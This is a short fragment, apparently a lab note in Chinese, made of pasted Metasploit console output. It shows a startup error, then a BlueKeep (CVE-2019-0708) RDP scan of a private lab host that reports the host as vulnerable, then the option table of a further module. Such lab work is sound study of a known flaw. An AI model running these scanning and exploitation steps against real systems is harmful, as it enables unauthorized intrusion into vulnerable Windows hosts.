# 启动时报错信息如下: root@kali:/opt/tools/msftools/CVE-2019-0708RDP# msfconsole Unable to find a spec satisfying metasploit-framework (>= 0) in the set. Perhaps the lockfile is corrupted? Run `bundle install` to install missing gems.
Name Current Setting Required Description ---- --------------- -------- ----------- RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect RDP_CLIENT_NAME rdesktop no The client computer name to report during connect, UNSET = random RDP_DOMAIN no The client domain name to report during connect RDP_USER no The username to report during connect, UNSET = random RHOSTS 192.168.220.130 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 3389 yes The target port (TCP) THREADS 1 yes The number of concurrent threads (max one per host)
Auxiliary action:
Name Description ---- ----------- Scan Scan for exploitable targets
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
[*] 192.168.220.130:3389 - Detected RDP on 192.168.220.130:3389 (Windows version: 6.1.7601) (Requires NLA: No) [+] 192.168.220.130:3389 - The target is vulnerable. [*] 192.168.220.130:3389 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Name Current Setting Required Description ---- --------------- -------- ----------- RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random RDP_DOMAIN no The client domain name to report during connect RDP_USER no The username to report during connect, UNSET = random RHOSTS 192.168.220.130 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 3389 yes The target port (TCP)